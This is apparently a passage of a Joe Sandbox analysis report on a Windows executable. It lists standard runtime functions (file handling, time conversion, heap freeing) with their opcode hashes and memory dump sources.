                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3c2c438fc886d9266b26b1d77d473080d340d464ba6af73c9b4e0904225c3da2
                                                                                                                                                                                                                                                                          • Instruction ID: 462086eeff8d15e8cbf665763b47239335975898a695f5ecf31b3b721e8a13d1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c2c438fc886d9266b26b1d77d473080d340d464ba6af73c9b4e0904225c3da2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51C322A086478AF718EF78D4403BDB3A1AF4875CF904535DEAD476E9DF38D44187A2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1452418845-0
                                                                                                                                                                                                                                                                          • Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                                                                                                                                                                                                                                          • Instruction ID: b94f5686b27ff1212efa2ef9037efe23bcbf34326d6cdb94a7479ce472bd8b96
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A311691E0D64341EB2CBB6DA4513B9A2909F457C8FC85035DA6E47AF7CE2CA80487F3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
                                                                                                                                                                                                                                                                          • Instruction ID: b7fd7a0236c16c854ed782c2a305b12ea210695b02c6a8d33c3f2e8a3d8d0f32
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F941DA22D1878783F758AB649540379B360FF98768F909335EAAC03AE1DF7CA5E08751
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
                                                                                                                                                                                                                                                                          • Instruction ID: 83276678c3686cf9a5b26585c7181a2029608a835a61b90911d9acd38237588f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2451F961B0964346E76CBE2E941067AE681AFC8BA4FD44734DDFC077E5CE3CE40186A6
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                          • Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                                                                                                                                                                                                                                          • Instruction ID: 6991a859a0596b85c2a19242833d0148f0fbda56fe90e8004e59ceae616e9379
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6611C465618B4281DB14AB29A444169F361AB48BF4FD80331EEBD07BF9CF3CE0528781
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDD5911), ref: 00007FF7FBDD5A2F
                                                                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDD5911), ref: 00007FF7FBDD5A45
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1707611234-0
                                                                                                                                                                                                                                                                          • Opcode ID: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
                                                                                                                                                                                                                                                                          • Instruction ID: e2976d0aa4e590a77815599a14892633ec0bb75bc6cb629bc5c962ad7b639a9a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F11947260C65781EB58AB58A44113EF760FB88765FD01236EAED859F8DF2CE044CB51
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF7FBDE3392,?,?,?,00007FF7FBDE33CF,?,?,00000000,00007FF7FBDE3895,?,?,00000000,00007FF7FBDE37C7), ref: 00007FF7FBDDAF22
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7FBDE3392,?,?,?,00007FF7FBDE33CF,?,?,00000000,00007FF7FBDE3895,?,?,00000000,00007FF7FBDE37C7), ref: 00007FF7FBDDAF2C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                                          • Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                                                                                                                                                                                                                                          • Instruction ID: a45f825488aba97dd9d1adc2db7b37d437824464afe36f130dc0c9a14c9d1bb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BE04F54E0A60742FB0DBBF9588503591545F88741FC04474DD6E462F2DE2C788542A3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF7FBDDAF99,?,?,00000000,00007FF7FBDDB04E), ref: 00007FF7FBDDB18A
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7FBDDAF99,?,?,00000000,00007FF7FBDDB04E), ref: 00007FF7FBDDB194
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                                                          • Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                                                                                                                                                                                                                                          • Instruction ID: 60c6dc1392069f033a637f8677fcaa613cdfebf4c89e6f6ad78a2d07611e2a28
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D21D425F1968341FB59B768949437992816F887E8FC84234DABE473F6CE2CA44583A3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                          • Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                                                                                                                                                                                                                                          • Instruction ID: 9bb8cbeeb37faf0be0dd81f0c07f50f72375ece23e532278fa2ef2c6814e661c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F41A37290824383EB28EB1DA540279B7A0EB59795FD41235D6ED43AE1CF2CF403C6A2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                                                          • Opcode ID: 484a048562b3c2ee783b60adbcbd8ed3d5a0cc61efed24fbbdfcf01001cbc5c8
                                                                                                                                                                                                                                                                          • Instruction ID: 8fbcf185417b7fced592d35d383d671061d53e007af657f2e640269a53eff317
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 484a048562b3c2ee783b60adbcbd8ed3d5a0cc61efed24fbbdfcf01001cbc5c8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121E461B0865345EB18BA1A6800BBAE651BF49BC4FC86030EE5C477D6CE3DE001C6E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                          • Opcode ID: cf493e245973df117cfb9bdb4be30e1b7cc3e093745a0bb3aa436662ba277ffd
                                                                                                                                                                                                                                                                          • Instruction ID: cdd45dccf7b476c8fd733c2772e21804ac9102352ae8d7b3bacd9d873782794f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf493e245973df117cfb9bdb4be30e1b7cc3e093745a0bb3aa436662ba277ffd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B31A421A1964785F759BB29884137CA650AF88BA9FC10135DEBD073F2CE7DE44187B3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                          • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                                          • Instruction ID: e74392a3353c687c5cb00fc5f3f88b1965a58f5b96f73f55662556b88417c598
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1119321E1C64381EB68FF59980127AE264BF89B84FC44431EADC47AE6CF7CD44087E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                          • Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                                                                                                                                                                                                                                          • Instruction ID: 7b5a36f07d57819f15a3317ee1d3fd3eb573f1d22acf563defc22d8e368778bf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8219532608A4386DB69AF5CE840379B6A0EB84B54F944234EA6D476E9DF3CD401CB52
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
